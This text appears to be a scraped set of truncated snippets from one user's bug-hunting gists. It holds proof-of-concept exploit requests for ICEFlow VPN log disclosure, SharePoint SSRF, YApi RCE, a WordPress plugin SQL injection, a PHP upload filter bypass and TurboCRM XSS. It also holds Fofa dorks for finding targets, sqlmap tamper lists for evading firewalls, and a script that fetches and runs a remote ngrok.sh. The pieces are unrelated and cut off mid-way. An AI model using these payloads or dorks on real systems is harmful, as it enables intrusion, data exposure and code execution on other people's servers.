pikpikcu

#!/bin/bash

wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1
chmod +x ng.sh
./ng.sh

function goto
{
    label=$1
    cd 

pikpikcu

# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```

pikpikcu

[
  {
    "program_name": "(ISC)²",
    "policy_url": "https://bugcrowd.com/isc2",
    "submission_url": "https://bugcrowd.com/isc2/report",
    "launch_date": "",
    "bug_bounty": false,
    "swag": false,
    "hall_of_fame": true,
    "safe_harbor": "partial"

pikpikcu

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

• The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

pikpikcu

ICEFlow VPN information disclosure vulnerability

Fofa

title="ICEFLOW VPN Router"

POC:

http://REDACTED/log/system.log
http://REDACTED/log/vpn.log
http://REDACTED/log/access.log

pikpikcu

Microsoft SharePoint Server - GetXmlDataFromDataSource Server-Side Request Forgery Information Disclosure Vulnerability

POC:

POST /_vti_bin/webpartpages.asmx HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
SOAPAction: "http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource"
Host: localhost

pikpikcu

POC YApi RCE:

Reference:

• YMFE/yapi#2229

POC

Requests:

POST /api/user/reg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

pikpikcu

WordPress Plugin - Google Review Slider 6.1 SQL Injection

poc:

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)

pikpikcu

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip

----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"

pikpikcu

TurboCRM Allow XSS (cross site scripting)

Dork

• https://fofa.so/result?qbase64=YXBwPSLnlKjlj4stVHVyYm9DUk0i
• https://fofa.so/result?qbase64=dGl0bGU9IueUqOWPiy1UdXJib0NSTSI%3D

Payloads

"><script>alert(/XSS/)</script>

Step To Reproduction